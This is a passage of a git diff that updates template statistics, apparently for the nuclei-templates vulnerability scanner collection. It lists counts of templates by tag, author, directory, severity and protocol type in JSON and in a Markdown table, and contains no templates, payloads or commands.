(@palaziv)","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"blckraven","count":1},{"name":"zhenwarx","count":1},{"name":"luci","count":1}],"directory":[{"name":"cves","count":534},{"name":"vulnerabilities","count":249},{"name":"exposed-panels","count":212},{"name":"exposures","count":170},{"name":"technologies","count":150},{"name":"misconfiguration","count":118},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":43},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":23},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":558},{"name":"high","count":434},{"name":"medium","count":361},{"name":"critical","count":204},{"name":"low","count":149}],"types":[{"name":"http","count":1613},{"name":"file","count":43},{"name":"network","count":35},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":511},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":173},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":83},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"cve2018","count":66},{"name":"","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":32},{"name":"logs","count":29},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"ssrf","count":27},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"dlink","count":10},{"name":"jenkins","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"devops","count":10},{"name":"magento","count":9},{"name":"gitlab","count":8},{"name":"router","count":8},{"name":"ftp","count":8},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"vmware","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"citrix","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"google","count":6},{"name":"java","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"cve2009","count":5},{"name":"phpmyadmin","count":5},{"name":"ruijie","count":5},{"name":"dedecms","count":5},{"name":"iis","count":5},{"name":"dell","count":5},{"name":"laravel","count":5},{"name":"files","count":5},{"name":"login","count":5},{"name":"lucee","count":5},{"name":"solr","count":5},{"name":"ssti","count":5},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":4},{"name":"solarwinds","count":4},{"name":"webserver","count":4},{"name":"tomcat","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"nodejs","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"samsung","count":4},{"name":"thinkphp","count":4},{"name":"asp","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"openssh","count":3},{"name":"vbulletin","count":3},{"name":"deserialization","count":3},{"name":"log","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"fanruan","count":3},{"name":"nacos","count":3},{"name":"windows","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"cve2010","count":3},{"name":"targa","count":3},{"name":"springcloud","count":3},{"name":"hp","count":3},{"name":"oa","count":3},{"name":"kubernetes","count":3},{"name":"grafana","count":3},{"name":"r-seenet","count":3},{"name":"ssh","count":3},{"name":"slack","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nosqli","count":3},{"name":"printer","count":3},{"name":"ebs","count":3},{"name":"amazon","count":3},{"name":"ofbiz","count":3},{"name":"kafka","count":3},{"name":"microstrategy","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"sonarqube","count":2},{"name":"shellshock","count":2},{"name":"fortios","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"saltstack","count":2},{"name":"showdoc","count":2},{"name":"openam","count":2},{"name":"cve2007","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"cve2008","count":2},{"name":"bitrix","count":2},{"name":"smb","count":2},{"name":"plesk","count":2},{"name":"injection","count":2},{"name":"spark","count":2},{"name":"nexus","count":2},{"name":"openfire","count":2},{"name":"rockethchat","count":2},{"name":"jboss","count":2},{"name":"sharepoint","count":2},{"name":"kibana","count":2},{"name":"nextjs","count":2},{"name":"vrealize","count":2},{"name":"emerge","count":2},{"name":"leak","count":2},{"name":"cache","count":2},{"name":"yapi","count":2},{"name":"sonicwall","count":2},{"name":"prometheus","count":2},{"name":"paloalto","count":2},{"name":"microsoft","count":2},{"name":"trixbox","count":2},{"name":"kevinlab","count":2},{"name":"xxljob","count":2},{"name":"intrusive","count":2},{"name":"voipmonitor","count":2},{"name":"huawei","count":2},{"name":"hjtcloud","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"igs","count":2},{"name":"odoo","count":2},{"name":"chiyu","count":2},{"name":"webcam","count":2},{"name":"ucmdb","count":2},{"name":"glassfish","count":2},{"name":"telerik","count":2},{"name":"zhiyuan","count":2},{"name":"zabbix","count":2},{"name":"flir","count":2},{"name":"service","count":2},{"name":"kentico","count":2},{"name":"splunk","count":2},{"name":"icewarp","count":2},{"name":"bigip","count":2},{"name":"pega","count":2},{"name":"wordfence","count":2},{"name":"linkerd","count":2},{"name":"ecology","count":2},{"name":"chamilo","count":2},{"name":"idrac","count":2},{"name":"smtp","count":2},{"name":"natshell","count":2},{"name":"hpe","count":2},{"name":"globalprotect","count":2},{"name":"oauth","count":2},{"name":"waf","count":2},{"name":"maian","count":2},{"name":"mida","count":2},{"name":"httpd","count":2},{"name":"jellyfin","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"couchdb","count":2},{"name":"hashicorp","count":2},{"name":"gitlist","count":1},{"name":"jquery","count":1},{"name":"razor","count":1},{"name":"checkpoint","count":1},{"name":"erp-nc","count":1},{"name":"mongo","count":1},{"name":"idemia","count":1},{"name":"shopware","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"bookstack","count":1},{"name":"spidercontrol","count":1},{"name":"timeclock","count":1},{"name":"zend","count":1},{"name":"tensorboard","count":1},{"name":"blind","count":1},{"name":"klog","count":1},{"name":"varnish","count":1},{"name":"javamelody","count":1},{"name":"2014","count":1},{"name":"oscommerce","count":1},{"name":"discourse","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"avalanche","count":1},{"name":"eprints","count":1},{"name":"acexy","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"lancom","count":1},{"name":"magicflow","count":1},{"name":"cloudflare","count":1},{"name":"wazuh","count":1},{"name":"selea","count":1},{"name":"pippoint","count":1},{"name":"bruteforce","count":1},{"name":"tenda","count":1},{"name":"backdoor","count":1},{"name":"swagger","count":1},{"name":"wifisky","count":1},{"name":"socomec","count":1},{"name":"csod","count":1},{"name":"octoprint","count":1},{"name":"etouch","count":1},{"name":"proftpd","count":1},{"name":"wavemaker","count":1},{"name":"clave","count":1},{"name":"plugin","count":1},{"name":"fortigates","count":1},{"name":"fortinet","count":1},{"name":"tensorflow","count":1},{"name":"szhe","count":1},{"name":"phpunit","count":1},{"name":"acme","count":1},{"name":"phalcon","count":1},{"name":"dvwa","count":1},{"name":"ganglia","count":1},{"name":"extractor","count":1},{"name":"fortiweb","count":1},{"name":"panabit","count":1},{"name":"moin","count":1},{"name":"grav","count":1},{"name":"bitly","count":1},{"name":"manageengine","count":1},{"name":"phpfusion","count":1},{"name":"hiboss","count":1},{"name":"mdb","count":1},{"name":"mirai","count":1},{"name":"netdata","count":1},{"name":"liferay","count":1},{"name":"rfi","count":1},{"name":"monitorix","count":1},{"name":"tongda","count":1},{"name":"gloo","count":1},{"name":"expose","count":1},{"name":"trilithic","count":1},{"name":"scimono","count":1},{"name":"visualtools","count":1},{"name":"drone","count":1},{"name":"vsftpd","count":1},{"name":"expn","count":1},{"name":"skywalking","count":1},{"name":"lanproxy","count":1},{"name":"huijietong","count":1},{"name":"jeewms","count":1},{"name":"rhymix","count":1},{"name":"dotnet","count":1},{"name":"soar","count":1},{"name":"k8","count":1},{"name":"jenkin","count":1},{"name":"opensns","count":1},{"name":"nuxeo","count":1},{"name":"nette","count":1},{"name":"nc2","count":1},{"name":"plc","count":1},{"name":"crm","count":1},{"name":"ssltls","count":1},{"name":"redwood","count":1},{"name":"nordex","count":1},{"name":"wso2","count":1},{"name":"goahead","count":1},{"name":"doh","count":1},{"name":"lansweeper","count":1},{"name":"harbor","count":1},{"name":"firebase","count":1},{"name":"redhat","count":1},{"name":"wiki","count":1},{"name":"sceditor","count":1},{"name":"sitecore","count":1},{"name":"vsphere","count":1},{"name":"ec2","count":1},{"name":"plone","count":1},{"name":"primetek","count":1},{"name":"wuzhicms","count":1},{"name":"lotuscms","count":1},{"name":"fedora","count":1},{"name":"itop","count":1},{"name":"monitorr","count":1},{"name":"dotclear","count":1},{"name":"triconsole","count":1},{"name":"circontrol","count":1},{"name":"lutron","count":1},{"name":"bash","count":1},{"name":"st","count":1},{"name":"alibaba","count":1},{"name":"parentlink","count":1},{"name":"diris","count":1},{"name":"totaljs","count":1},{"name":"comodo","count":1},{"name":"nexusdb","count":1},{"name":"circontrorl","count":1},{"name":"zte","count":1},{"name":"nuuo","count":1},{"name":"postmessage","count":1},{"name":"setup","count":1},{"name":"mautic","count":1},{"name":"zarafa","count":1},{"name":"zmanda","count":1},{"name":"dotnetnuke","count":1},{"name":"beanshell","count":1},{"name":"upload","count":1},{"name":"blue-ocean","count":1},{"name":"plastic","count":1},{"name":"vscode","count":1},{"name":"ruby","count":1},{"name":"fastapi","count":1},{"name":"ulterius","count":1},{"name":"xunchi","count":1},{"name":"sentry","count":1},{"name":"ruckus","count":1},{"name":"nsasg","count":1},{"name":"jmx","count":1},{"name":"chinaunicom","count":1},{"name":"darkstat","count":1},{"name":"memcached","count":1},{"name":"stem","count":1},{"name":"grails","count":1},{"name":"kafdrop","count":1},{"name":"enum","count":1},{"name":"zimbra","count":1},{"name":"ilo4","count":1},{"name":"rdp","count":1},{"name":"anchorcms","count":1},{"name":"nedi","count":1},{"name":"mara","count":1},{"name":"mantis","count":1},{"name":"sco","count":1},{"name":"faraday","count":1},{"name":"hasura","count":1},{"name":"kerbynet","count":1},{"name":"servicedesk","count":1},{"name":"opentsdb","count":1},{"name":"salesforce","count":1},{"name":"fastcgi","count":1},{"name":"appweb","count":1},{"name":"openerp","count":1},{"name":"woocomernce","count":1},{"name":"octobercms","count":1},{"name":"linkedin","count":1},{"name":"yachtcontrol","count":1},{"name":"zm","count":1},{"name":"tapestry","count":1},{"name":"vnc","count":1},{"name":"node-red-dashboard","count":1},{"name":"mobileiron","count":1},{"name":"ssl","count":1},{"name":"ecom","count":1},{"name":"empirecms","count":1},{"name":"postgres","count":1},{"name":"svnserve","count":1},{"name":"heroku","count":1},{"name":"moinmoin","count":1},{"name":"centos","count":1},{"name":"jitsi","count":1},{"name":"cacti","count":1},{"name":"cse","count":1},{"name":"cocoon","count":1},{"name":"csrf","count":1},{"name":"timesheet","count":1},{"name":"keenetic","count":1},{"name":"xff","count":1},{"name":"flash","count":1},{"name":"gogs","count":1},{"name":"majordomo2","count":1},{"name":"opensmtpd","count":1},{"name":"exchange","count":1},{"name":"opm","count":1},{"name":"fuelcms","count":1},{"name":"pulsesecure","count":1},{"name":"pgadmin","count":1},{"name":"webui","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"mpsec","count":1},{"name":"exacqvision","count":1},{"name":"sprintful","count":1},{"name":"bullwark","count":1},{"name":"netrc","count":1},{"name":"openrestry","count":1},{"name":"smartsense","count":1},{"name":"flink","count":1},{"name":"metinfo","count":1},{"name":"robomongo","count":1},{"name":"emc","count":1},{"name":"fortigate","count":1},{"name":"cve2005","count":1},{"name":"gridx","count":1},{"name":"synnefo","count":1},{"name":"calendarix","count":1},{"name":"eyou","count":1},{"name":"xdcms","count":1},{"name":"subrion","count":1},{"name":"servicenow","count":1},{"name":"rmi","count":1},{"name":"db","count":1},{"name":"enumeration","count":1},{"name":"powercreator","count":1},{"name":"jenzabar","count":1},{"name":"zzzcms","count":1},{"name":"openstack","count":1},{"name":"ems","count":1},{"name":"wmt","count":1},{"name":"chevereto","count":1},{"name":"74cms","count":1},{"name":"mailchimp","count":1},{"name":"webadmin","count":1},{"name":"glances","count":1},{"name":"cgi","count":1},{"name":"episerver","count":1},{"name":"dompdf","count":1},{"name":"rsyncd","count":1},{"name":"shopxo","count":1},{"name":"aspnuke","count":1},{"name":"viewpoint","count":1},{"name":"mariadb","count":1},{"name":"wavlink","count":1},{"name":"javafaces","count":1},{"name":"webmodule-ee","count":1},{"name":"hortonworks","count":1},{"name":"kubeflow","count":1},{"name":"sqlite","count":1},{"name":"cors","count":1},{"name":"geutebruck","count":1},{"name":"labtech","count":1},{"name":"apiman","count":1},{"name":"nps","count":1},{"name":"jnoj","count":1},{"name":"azure","count":1},{"name":"fortilogger","count":1},{"name":"zenario","count":1},{"name":"duomicms","count":1},{"name":"seacms","count":1},{"name":"linksys","count":1},{"name":"thinkadmin","count":1},{"name":"finereport","count":1},{"name":"viewlinc","count":1},{"name":"haproxy","count":1},{"name":"spring","count":1},{"name":"npm","count":1},{"name":"xml","count":1},{"name":"wamp","count":1},{"name":"spectracom","count":1},{"name":"ricoh","count":1},{"name":"pacsone","count":1},{"name":"rubedo","count":1},{"name":"xmlchart","count":1},{"name":"concrete","count":1},{"name":"landray","count":1},{"name":"accela","count":1},{"name":"mediumish","count":1},{"name":"alerta","count":1},{"name":"k8s","count":1},{"name":"avtech","count":1},{"name":"akamai","count":1},{"name":"weiphp","count":1},{"name":"ntopng","count":1},{"name":"wp-theme","count":1},{"name":"turbocrm","count":1},{"name":"netis","count":1},{"name":"expressjs","count":1},{"name":"kyan","count":1},{"name":" default-login","count":1},{"name":"redis","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"dlogin","count":1},{"name":"ns","count":1},{"name":"esmtp","count":1},{"name":"tika","count":1},{"name":"uwsgi","count":1},{"name":"sarg","count":1},{"name":"glpi","count":1},{"name":"rmc","count":1},{"name":"kong","count":1},{"name":"favicon","count":1},{"name":"fiori","count":1},{"name":"cloudinary","count":1},{"name":"blackboard","count":1},{"name":"symfony","count":1},{"name":"panos","count":1},{"name":"landrayoa","count":1},{"name":"druid","count":1},{"name":"gateone","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"aura","count":1},{"name":"floc","count":1},{"name":"feifeicms","count":1},{"name":"arl","count":1},{"name":"lighttpd","count":1},{"name":"portainer","count":1},{"name":"hadoop","count":1},{"name":"maccmsv10","count":1},{"name":"wooyun","count":1},{"name":"solman","count":1},{"name":"horde","count":1},{"name":"sidekiq","count":1},{"name":"krweb","count":1},{"name":"htmli","count":1},{"name":"myucms","count":1},{"name":"h3c-imc","count":1},{"name":"tileserver","count":1},{"name":"email","count":1},{"name":"iptime","count":1},{"name":"domxss","count":1},{"name":"ueditor","count":1},{"name":"bedita","count":1},{"name":"traefik","count":1},{"name":"mcafee","count":1},{"name":"commscope","count":1},{"name":"geddy","count":1},{"name":"realteo","count":1},{"name":"addpac","count":1},{"name":"jfrog","count":1},{"name":"node","count":1},{"name":"biometrics","count":1},{"name":"optiLink","count":1},{"name":"webftp","count":1},{"name":"emby","count":1},{"name":"ioncube","count":1},{"name":"axis","count":1},{"name":"visionhub","count":1},{"name":"saltapi","count":1},{"name":"rabbitmq","count":1},{"name":"alertmanager","count":1},{"name":"codeigniter","count":1},{"name":"yii","count":1},{"name":"clusterengine","count":1},{"name":"status","count":1},{"name":"spf","count":1},{"name":"zcms","count":1},{"name":"jsf","count":1},{"name":"opencast","count":1},{"name":"zookeeper","count":1},{"name":"dom","count":1},{"name":"discord","count":1},{"name":"codemeter","count":1},{"name":"embedthis","count":1},{"name":"akkadian","count":1},{"name":"mysql","count":1},{"name":"phpinfo","count":1},{"name":"rujjie","count":1},{"name":"apos","count":1},{"name":"dvr","count":1},{"name":"xiuno","count":1},{"name":"nomad","count":1},{"name":"springframework","count":1},{"name":"ambari","count":1},{"name":"pyramid","count":1},{"name":"zeroshell","count":1},{"name":"clockwatch","count":1},{"name":"scs","count":1},{"name":"b2evolution","count":1},{"name":"netsweeper","count":1},{"name":"webmin","count":1},{"name":"cobub","count":1},{"name":"adminer","count":1},{"name":"jsp","count":1},{"name":"upnp","count":1},{"name":"tamronos","count":1},{"name":"javascript","count":1},{"name":"mantisbt","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":48},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"philippedelteil","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index de3a4b0e6c..f99c983619 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,669 +1,643 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 527 | dhiyaneshdk | 227 | cves | 534 | info | 558 | http | 1613 | -| panel | 210 | pikpikcu | 219 | vulnerabilities | 249 | high | 434 | file | 43 | -| xss | 192 | pdteam | 188 | exposed-panels | 212 | medium | 361 | network | 35 | -| wordpress | 182 | dwisiswant0 | 126 | exposures | 170 | critical | 204 | dns | 10 | -| exposure | 178 | geeknik | 120 | technologies | 150 | low | 149 | | | -| rce | 175 | daffainfo | 104 | misconfiguration | 118 | | | | | -| cve2020 | 151 | madrobot | 60 | takeovers | 70 | | | | | -| lfi | 150 | princechaddha | 53 | default-logins | 49 | | | | | -| wp-plugin | 121 | gy741 | 48 | file | 43 | | | | | -| tech | 92 | gaurang | 42 | workflows | 34 | | | | | -| config | 90 | pussycat0x | 36 | network | 27 | | | | | -| cve2019 | 83 | ice3man | 26 | miscellaneous | 27 | | | | | -| cve2021 | 83 | organiccrap | 24 | iot | 23 | | | | | +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| config | 90 | gaurang | 42 | workflows | 34 | | | | | +| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | +| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | +| tech | 78 | organiccrap | 24 | iot | 22 | | | | | | takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | | cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | -| | 66 | philippedelteil | 15 | cnvd | 9 | | | | | -| token | 64 | milo2012 | 14 | headless | 5 | | | | | -| apache | 61 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 50 | pr3r00t | 13 | | | | | | | -| cve2017 | 45 | suman_kar | 12 | | | | | | | -| iot | 44 | cyllective | 11 | | | | | | | -| file | 43 | random_robbie | 10 | | | | | | | -| unauth | 42 | wdahlenb | 9 | | | | | | | -| network | 35 | righettod | 9 | | | | | | | -| sqli | 34 | aashiq | 8 | | | | | | | +| | 66 | milo2012 | 14 | cnvd | 9 | | | | | +| token | 63 | philippedelteil | 14 | headless | 5 | | | | | +| apache | 61 | pr3r00t | 13 | 